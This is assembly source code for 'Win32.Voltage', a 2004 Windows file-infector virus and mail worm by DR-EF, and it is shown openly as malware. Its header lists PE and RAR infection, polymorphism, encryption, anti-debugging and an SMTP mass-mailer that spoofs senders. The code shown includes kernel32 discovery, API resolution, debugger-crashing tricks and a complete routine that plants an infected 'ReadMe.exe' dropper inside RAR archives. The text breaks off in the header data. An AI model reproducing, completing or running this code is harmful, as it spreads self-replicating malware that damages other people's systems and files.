; I-Worm\Win32.Voltage by DR-EF (c) 2004,Version 2.2
; --------------------------------------------------
; 
; Virus Name:Win32.Voltage
; Virus Size:22k
; Type:PE\RAR Infector\Mail worm
; Author:DR-EF
;
; Virus Features:
; ---------------
; - use the registry shell spawning technice to infect exe files
;  when they executed
; - encrypted by 2 layers
; - use EPO
; - polymorphic engine can generate diffrent instructions for the
;  same action,mixed with junk code + using SEH to jump to host
; - infect rar files by adding infected file\dropper
; - anti debugging features
; 
; Mail Worm Features:
; -------------------
; - 5 messages,subjects,filenames
; - SMTP engine + base64 encoder
; - collect mails from WAB & temporary internet files
; - spoof mailfrom
;
; Fixed Bugs From Old Versions:
; -----------------------------
; - search kernel base with SEH walker instead of last stack method
; - dont set code flag at last section,only read/write
; - fixed bug with image size of infected files
; - removed 1 section in the dropper (wvltg.exe)
; - replaced the CheckFileName function


.386
.model flat

extrn MessageBoxA:proc

DEBUG equ 0 ;switch debug version on\off
VirusSize equ (VirusEnd-_main)
EncryptedVirus equ (EncryptedVirusEnd-(_main+EncryptionStart))

.data
db ?

.code

_main: 
mov esp,[esp + 8h]
pop dword ptr fs:[0]
add esp,0ch ;restore stack
call DecryptVirus
EncryptionStart equ ($-_main)
mov esp,[esp + 8h] ;restore stack
pop dword ptr fs:[0]
add esp,4h
VirusStart equ $
call Delta
Delta: pop ebp
sub ebp,offset Delta
call FindKernel
jmp SearchGetProcAddress

Wvltg_EntryPoint:
call Delta_ ;get delta offset
Delta_: pop ebp
sub ebp,offset Delta_
lea eax,[ebp + Exit_V]
push eax
pushad
jmp VirusStart


FindKernel: ;find kernel using SEH walker
    mov eax,fs:[0]
search_last:
    mov edx,[eax]
    inc edx
    jz found_last
    dec edx
    xchg edx,eax
    jmp search_last
found_last:
    mov eax,[eax+4]
    and eax,0ffff0000h
search_mz:
    cmp word ptr [eax],"ZM"
    jz found_mz
    sub eax,10000h
    jmp search_mz
found_mz:
mov [ebp + kernel32base],eax
ret

kernel32base dd 0
_GetProcAddress db "GetProcAddress",0
__GetProcAddress dd 0
ApiNamesTable:

_CreateFile db "CreateFileA",0
_CloseHandle db "CloseHandle",0
_CreateFileMapping db "CreateFileMappingA",0
_MapViewOfFile db "MapViewOfFile",0
_UnmapViewOfFile db "UnmapViewOfFile",0
_GetCommandLine db "GetCommandLineA",0
_CreateProcess db "CreateProcessA",0
_LoadLibrary db "LoadLibraryA",0
_FreeLibrary db "FreeLibrary",0
GetSystemDirectoryA db "GetSystemDirectoryA",0
lstrcatA db "lstrcatA",0
_GetModuleFileName db "GetModuleFileNameA",0
_SetFileAttributesA db "SetFileAttributesA",0
_GetStartupInfoA db "GetStartupInfoA",0
_GetFileSize db "GetFileSize",0
_SetFilePointer db "SetFilePointer",0
_SetEndOfFile db "SetEndOfFile",0
_GetTickCount db "GetTickCount",0
_GlobalAlloc db "GlobalAlloc",0
_GlobalFree db "GlobalFree",0
_GetLocalTime db "GetLocalTime",0
_GetFileAttributes db "GetFileAttributesA",0
_GetFileTime db "GetFileTime",0
_SetFileTime db "SetFileTime",0
_DeleteFile db "DeleteFileA",0
_CreateMutexA db "CreateMutexA",0
_OpenMutexA db "OpenMutexA",0
_FindFirstFileA db "FindFirstFileA",0
_FindNextFileA db "FindNextFileA",0
_SetCurrentDirectoryA db "SetCurrentDirectoryA",0
_WriteFile db "WriteFile",0
_FindClose db "FindClose",0
_MultiByteToWideChar db "MultiByteToWideChar",0
_ExitProcess db "ExitProcess",0

ApiAddressTable:

CreateFile dd 0
CloseHandle dd 0
CreateFileMapping dd 0
MapViewOfFile dd 0
UnMapViewOfFile dd 0
GetCommandLine dd 0
CreateProcess dd 0
LoadLibrary dd 0
FreeLibrary dd 0
GetSystemDirectory dd 0
lstrcat dd 0
GetModuleFileName dd 0
SetFileAttributes dd 0
GetStartupInfo dd 0
GetFileSize dd 0
SetFilePointer dd 0
SetEndOfFile dd 0
GetTickCount dd 0
GlobalAlloc dd 0
GlobalFree dd 0
GetLocalTime dd 0
GetFileAttributes dd 0
GetFileTime dd 0
SetFileTime dd 0
DeleteFile dd 0
CreateMutex dd 0
OpenMutex dd 0
FindFirstFile dd 0
FindNextFile dd 0
SetCurrentDirectory dd 0
WriteFile dd 0
FindClose dd 0
MultiByteToWideChar dd 0
ExitProcess dd 0

NumberOfApis equ 34


SearchGetProcAddress:
mov eax,[ebp + kernel32base]
add eax,[eax + 3ch]
mov eax,[eax + 78h]
add eax,[ebp + kernel32base]
;eax - kernel32 export table
push eax
xor edx,edx
mov eax,[eax + 20h]
add eax,[ebp + kernel32base]
mov edi,[eax]
add edi,[ebp + kernel32base]
;edi - api names array
dec edi
nxt_cmp:inc edi
lea esi,[ebp + _GetProcAddress]
mov ecx,0eh
rep cmpsb
je search_address
inc edx
nxt_l: cmp byte ptr [edi],0h
je nxt_cmp
inc edi
jmp nxt_l
search_address:
pop eax
;eax - kernel32 export table
;edx - GetProcAddress position
shl edx,1h
mov ebx,[eax + 24h]
add ebx,[ebp + kernel32base]
add ebx,edx
mov dx,word ptr [ebx]
shl edx,2h
mov ebx,[eax + 1ch]
add ebx,[ebp + kernel32base]
add ebx,edx
mov ebx,[ebx]
add ebx,[ebp + kernel32base]
mov [ebp + __GetProcAddress],ebx
mov ecx,NumberOfApis
lea eax,[ebp + ApiNamesTable]
lea ebx,[ebp + ApiAddressTable]
mov edx,[ebp + kernel32base]
call get_apis
jc Do_Virus_Actions
jmp ReturnToHost
Do_Virus_Actions:
pushad
lea eax,[ebp + AntiDebug]
push eax
xor eax,eax
push dword ptr fs:[eax]
mov fs:[eax],esp
mov [eax],ebx ;force debugger to jump
AntiDebug:
mov esp,[esp + 8h]
pop dword ptr fs:[0]
add esp,4h
popad
call CrashDebuggers ;now if we under debugger we simple crash
call GetADVAPI32Apis
jnc ReturnToHost
call GetUser32Apis ;used for debug and payload
jnc ReturnToHost
call AntiLamers
call HideVirus
call ProcessCommandLine
cmp byte ptr [ebp + RunFromExeHooker],1h ;we run from virus exe hooker ?
je ExecuteAndInfectFile
call InstallVirus
jmp ReturnToHost
ExecuteAndInfectFile:
mov byte ptr [ebp + Infection_Success],0h
call InfectFile
call InstallVirus
call PayLoad
call ExecuteFile
call MassMail
lea eax,[ebp + FileDirectory]
call ScanDirectoryForRarFiles
ReturnToHost:
cmp byte ptr [ebp + RunFromExeHooker],1h
jne RetHost
Exit_V:
push eax ;if we running from virus exe hooker
call [ebp + ExitProcess] ;we simple exit
RetHost:popad
db 64h,0a1h,0,0,0,0 ;mov eax,fs:[00000000]
dec ebx
ret

CopyRight db "Win32.Voltage Virus Written By DR-EF (c) 2004",0
SizeOfCopyRight equ ($-CopyRight)

AntiLamers:
lea edx,[ebp + CopyRight] ;)
mov ecx,SizeOfCopyRight 
xor eax,eax 
call xcrc32 
cmp eax,0C3F9A421h 
je NoRip 
xor esp,esp 
NoRip: ret 


GetUser32Apis:
lea eax,[ebp + User32dll]
push eax
call [ebp + LoadLibrary]
xchg eax,edx
mov ecx,NumberOfUser32Functions
lea eax,[ebp + user32_functions_sz]
lea ebx,[ebp + user32_functions_addresses]
call get_apis
ret

User32dll db "User32.dll",0
user32_functions_sz:

_MessageBox db "MessageBoxA",0
_SetWindowTextA db "SetWindowTextA",0

user32_functions_addresses:

MessageBox dd 0
SetWindowText dd 0

NumberOfUser32Functions equ 2


CrashDebuggers: 
lea eax,[ebp + _IsDebuggerPresent]
push eax
push [ebp + kernel32base]
call [ebp + __GetProcAddress]
cmp eax,0h
je NoIDP
call eax
cmp eax,0h
je NoIDP
xor esp,esp ;hang debuggers
NoIDP: ret

_IsDebuggerPresent db "IsDebuggerPresent",0


;eax - pointer to directory name:
ScanDirectoryForRarFiles:
push eax
call [ebp + SetCurrentDirectory]
cmp eax,INVALID_HANDLE_VALUE
je ExitRarScan
lea eax,[ebp + WIN32_FIND_DATA]
push eax
lea eax,[ebp + RarFiles]
push eax
call [ebp + FindFirstFile]
cmp eax,INVALID_HANDLE_VALUE
je ExitRarScan
mov [ebp + hfind],eax ;save search handle
@rar: call InfectRar
lea eax,[ebp + WIN32_FIND_DATA]
push eax
push dword ptr [ebp + hfind]
call [ebp + FindNextFile]
cmp eax,0h
jne @rar
ExitRarScan:
ret

RarFiles db "*.rar",0

;rar archive infection procedure:
;tested with rar archive"s that created using winrar v3.20
InfectRar:
call InitRandomNumber
cmp [ebp + nFileSizeLow],300000h
ja ExitRarInfection ;do not infect files that are bigger than 3mb
cmp byte ptr [ebp + Infection_Success],0h
je usewvltg
xor ecx,ecx
lea esi,[ebp + FileToInfect]
GetLen: cmp byte ptr [esi],0h
je CopyPth
inc ecx
inc esi
jmp GetLen
CopyPth:inc ecx
lea esi,[ebp + FileToInfect]
lea edi,[ebp + InfectedDropper] ;use infected file
rep movsb
jmp OpenDropper
usewvltg: 
push 0ffh
lea eax,[ebp + InfectedDropper]
push eax
push 0h
call [ebp + GetModuleFileName] ;use virus dropper
cmp eax,0h
je ExitRarInfection
OpenDropper: 
xor eax,eax
push eax
push eax
push OPEN_EXISTING
push eax
push FILE_SHARE_READ
push GENERIC_READ
lea eax,[ebp + InfectedDropper]
push eax
call [ebp + CreateFile] ;open the infected dropper
cmp eax,INVALID_HANDLE_VALUE
je ExitRarInfection
mov [ebp + hInfectedDropper],eax
push 0h
push eax
call [ebp + GetFileSize] ;get dropper file size
cmp eax,0ffffffffh
je ExitAndCloseDropperFile
mov [ebp + DropperSize],eax
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push dword ptr [ebp + hInfectedDropper]
call [ebp + CreateFileMapping] ;create file mapping object for the dropper
cmp eax,0h
je ExitAndCloseDropperFile
mov [ebp + hDropperMap],eax
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push dword ptr [ebp + hDropperMap]
call [ebp + MapViewOfFile] ;map dropper into memory
cmp eax,0h
je ExitAndCloseDropperMap
mov [ebp + DropperMap],eax
xor eax,eax
push eax
push eax
push OPEN_EXISTING
push eax
push FILE_SHARE_READ
push GENERIC_READ or GENERIC_WRITE
lea eax,[ebp + cFileName]
push eax
call [ebp + CreateFile] ;open rar file
cmp eax,INVALID_HANDLE_VALUE
je ExitAndUnMapDropper
mov [ebp + hRarFile],eax
xor eax,eax
push eax
mov eax,[ebp + nFileSizeLow]
add eax,[ebp + DropperSize]
add eax,RarHeaderSize
sub eax,7h ;overwrite rar file sign
push eax
xor eax,eax
push eax
push PAGE_READWRITE
push eax
push dword ptr [ebp + hRarFile]
call [ebp + CreateFileMapping] ;create file mapping object of the rar file
cmp eax,0h
je ExitAndCloseRarFile
mov [ebp + hRarMap],eax
mov eax,[ebp + nFileSizeLow]
add eax,[ebp + DropperSize]
add eax,RarHeaderSize
sub eax,7h ;overwrite rar file sign
push eax
xor eax,eax
push eax
push eax
push FILE_MAP_WRITE
push dword ptr [ebp + hRarMap]
call [ebp + MapViewOfFile]
cmp eax,0h
je ExitAndCloseRarMap
mov [ebp + RarMap],eax
cmp dword ptr [eax],"!raR" ;is rar file ?
jne RarFileInfectionErr
cmp byte ptr [eax + 0fh],1h ;is already infected ?
je RarFileInfectionErr
xor eax,eax
mov edx,[ebp + DropperMap]
mov ecx,[ebp + DropperSize]
call xcrc32 ;get infected dropper crc32 checksum
mov dword ptr [ebp + FILE_CRC],eax ;set it insaid rar header
mov eax,dword ptr [ebp + ftCreationTime + 4]
mov dword ptr [ebp + FTIME],eax ;set random time\data
pushad
mov ecx,6h
lea edi,[ebp + FileInsaidRar]
@RandLetter: 
call GenRandomNumber
and al,19h
add al,61h
stosb
loop @RandLetter ;gen random name for the infected dropper
popad
mov eax,[ebp + DropperSize]
mov [ebp + PACK_SIZE],eax
mov [ebp + UNP_SIZE],eax ;set dropper size insaid of rar header
xor eax,eax
lea edx,[ebp + headcrc]
mov ecx,(EndRarHeader-RarHeader-2)
call xcrc32 ;get crc32 checksum of the rar header
mov word ptr [ebp + HEAD_CRC],ax ;and set it in rar header
lea esi,[ebp + RarHeader]
mov edi,[ebp + RarMap]
add edi,[ebp + nFileSizeLow]
sub edi,7h ;overwrite rar file sign
push edi
mov ecx,RarHeaderSize
rep movsb ;write the rar header into rar file
mov esi,[ebp + DropperMap]
pop edi
add edi,RarHeaderSize
mov ecx,[ebp + DropperSize]
rep movsb ;write the infected dropper into rar file
mov eax,[ebp + RarMap]
push eax
inc byte ptr [eax + 0fh] ;mark the rar file as infected(0fh=reserved1)
mov edx,eax
xor eax,eax
add edx,9h
mov ecx,0bh
call xcrc32 ;get crc32 of the rar main header
pop ebx
mov word ptr [ebx + 7h],ax ;[ebx + 7h]=HEAD_CRC
ExitAndUnMapRarFile:
push [ebp + RarMap]
call [ebp + UnMapViewOfFile]
ExitAndCloseRarMap:
push dword ptr [ebp + hRarMap]
call [ebp + CloseHandle]
ExitAndCloseRarFile:
push dword ptr [ebp + hRarFile]
call [ebp + CloseHandle]
ExitAndUnMapDropper:
push dword ptr [ebp + DropperMap] 
call [ebp + UnMapViewOfFile]
ExitAndCloseDropperMap:
push dword ptr [ebp + hDropperMap]
call [ebp + CloseHandle]
ExitAndCloseDropperFile:
push dword ptr [ebp + hInfectedDropper]
call [ebp + CloseHandle]
ExitRarInfection:
ret
RarFileInfectionErr:
push FILE_BEGIN
push 0h
push dword ptr [ebp + nFileSizeLow]
push dword ptr [ebp + hRarFile]
call [ebp + SetFilePointer]
push dword ptr [ebp + hRarFile]
call [ebp + SetEndOfFile]
jmp ExitAndUnMapRarFile


InfectedDropper db 0ffh dup(0)
hInfectedDropper dd 0
DropperSize dd 0
hDropperMap dd 0
DropperMap dd 0
hRarFile dd 0
hRarMap dd 0
RarMap dd 0



RarHeader:
HEAD_CRC dw 0h
headcrc:HEAD_TYPE db 74h
HEAD_FLAGS dw 8000h ;normal flag
HEAD_SIZE dw RarHeaderSize
PACK_SIZE dd 0h
UNP_SIZE dd 0h
HOST_OS db 0h ;Ms-Dos
FILE_CRC dd 0h
FTIME dd 0h
UNP_VER db 14h
METHOD db 30h ;storing
NAME_SIZE dw 0ah ;file name size
endhcrc:ATTR dd 0h
FileInsaidRar equ $
FILE_NAME db "ReadMe.exe"
